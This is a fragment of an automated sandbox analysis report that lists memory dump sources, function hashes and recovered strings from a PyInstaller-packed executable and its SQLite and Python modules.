                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                              • API String ID: 0-3733955532
                                                                                                                                                                                                                                              • Opcode ID: 277c94ae1e11b724fb70cb3282ddbc3275fdb8f065c91e1fc0448e61370f49ab
                                                                                                                                                                                                                                              • Instruction ID: 8c875e39d1888c8b72f76b675c67ae3b5d57457b70a47531b278a93bbf4f813a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277c94ae1e11b724fb70cb3282ddbc3275fdb8f065c91e1fc0448e61370f49ab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3029329B09A8281EB5D9B12A4B4BBD63A0EF45B81F8441B5CE7E477D9DF7CE844C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                                              • API String ID: 4245020737-4278345224
                                                                                                                                                                                                                                              • Opcode ID: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                                              • Instruction ID: 2598797c64e4db6ec277d861d6e7048185b5bd84d13d797da66f4593b3b8d4b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00214B39F08A439AEB188B15E460A797365FB55B84F9440B1D92E87BDCDF2DE44A8304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                              • API String ID: 3510742995-875588658
                                                                                                                                                                                                                                              • Opcode ID: b6f613d7b6e0414598f0e2a4e4e230e5bdcb321446d8c93f17798dcb33a970b9
                                                                                                                                                                                                                                              • Instruction ID: 916dc8a57d15ad7e487d51979ae94b652ef22417dce7f0bf8bbeb6218df70a1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6f613d7b6e0414598f0e2a4e4e230e5bdcb321446d8c93f17798dcb33a970b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34E17072F0865689FB29CF64E470BBC27A0AB04748F844176DE3E5AADDDE7CA845C740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Cannot add a UNIQUE column, xrefs: 00007FFDFABC796C
                                                                                                                                                                                                                                              • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFABC79C7, 00007FFDFABC7A43, 00007FFDFABC7B51
                                                                                                                                                                                                                                              • Cannot add a column with non-constant default, xrefs: 00007FFDFABC7A39
                                                                                                                                                                                                                                              • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFABC79DF
                                                                                                                                                                                                                                              • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFABC7D2C
                                                                                                                                                                                                                                              • cannot add a STORED column, xrefs: 00007FFDFABC7B42
                                                                                                                                                                                                                                              • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFABC7951
                                                                                                                                                                                                                                              • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFABC79BD
                                                                                                                                                                                                                                              • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFABC7BE4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                              • API String ID: 3510742995-200680935
                                                                                                                                                                                                                                              • Opcode ID: 5c3ea07040aaf60c9262134e35194fbb7867a04b5ab88e8aea81ba58f857b353
                                                                                                                                                                                                                                              • Instruction ID: f0add7beba5dc5f06fa46e3f2480251ba1910e557a99c5b400a92cb6fc1cb3f0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c3ea07040aaf60c9262134e35194fbb7867a04b5ab88e8aea81ba58f857b353
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26E18B65B08A8285EB688B16A564FB967B1FB40BC4F8501B1DEAD07BDDDF3DE491C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                                              • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                              • Instruction ID: ec2b8e359a38391f51e1e6cee61cea25bc9dbfaa70dcd20db93100e4be687e84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B819D21F086438EFB6D9B659870A793690AF95780F5440B5EA2C437DEDE3CE84F8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: a59d2eb9e0c1bfefa1bdff49e8a6065b577ecdf93e17dd52da3a8f57425589c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE129471E0C26386FF205B14D95E67976A2FB50770F844136EE8987AC4DF3CE9A08B16
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: e8a643046ec8364d39d7899dceab3667915c4dda962fd032ec5b0fb8bd0b14bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94128462E0C14386FF245E14EC5A77976A1FB41774FE48135EA9A879C4DF7CE4A08B02
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: new[]
                                                                                                                                                                                                                                              • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                              • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                              • Opcode ID: 6620010e7044335df54d957efec44e4603a8576bb54a78712787ebc1850900a5
                                                                                                                                                                                                                                              • Instruction ID: 4ce3cb9919391c8ee8e9ee149e6401366382f7c6f953e83a54c58df1d7070f24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6620010e7044335df54d957efec44e4603a8576bb54a78712787ebc1850900a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36519411F0C6C745FB5D9B65A431EBA6791AF44BC8F8880B5D96D0B6CECE7CE4468300
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                              • Instruction ID: cfa4bf5834d1cb3063852b2fe82e2636f6180bf66d6db2846a27d932344d0acc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7141C161B086528AFE00EB1AAC466B96390FF44FE0F444432ED0CC7796DF3DE9818346
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F8704
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: GetEnvironmentVariableW.KERNEL32(00007FF62C0F388E), ref: 00007FF62C0F8867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62C0F8889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C108238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C108251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                              • Instruction ID: 127c8c644071327446e162895d4b684c9f51dfee4e1841e75d0c787e07839a10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB41D111A1D64248FE11E729AC5A2F91390AF897E0F944131ED0DC77DADF3DE546C30A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                              • API String ID: 2221118986-554953066
                                                                                                                                                                                                                                              • Opcode ID: fc66748217be836b8a2eda49d8ea759b9e0924403c810d45a22a7306ee77088b
                                                                                                                                                                                                                                              • Instruction ID: 46b530eb1dd3c9ecad501be9c26da6057cca180367ec2d24e7939da91af5c2fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc66748217be836b8a2eda49d8ea759b9e0924403c810d45a22a7306ee77088b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41327C72B08B818AEB68CF25D460BAE77A4FB45B88F804176DE6D47799DF38E451C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction ID: 722620e8f7bca7ae4c62cb52f5d97fcb6d4cfd0f9f36ee603dd409f7f3c6af98
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED17032A087818AEF20DF2598413AD77A0FB457A8F140135EE9D97B9ACF39E0D1C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                                              • API String ID: 2221118986-3207396689
                                                                                                                                                                                                                                              • Opcode ID: 25e24649bc2dc04d7cc02a2155f76509de9b1b464349d30fb1a6db6ce22d829b
                                                                                                                                                                                                                                              • Instruction ID: 88ee5c4ad397bd59046c08977323d00841cdf38add732166a8c7d58314244cff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25e24649bc2dc04d7cc02a2155f76509de9b1b464349d30fb1a6db6ce22d829b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05024962F1D2C24AE7298A29A060F7D7FF1EB45344F8541B5DEAD476CACEADE481C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
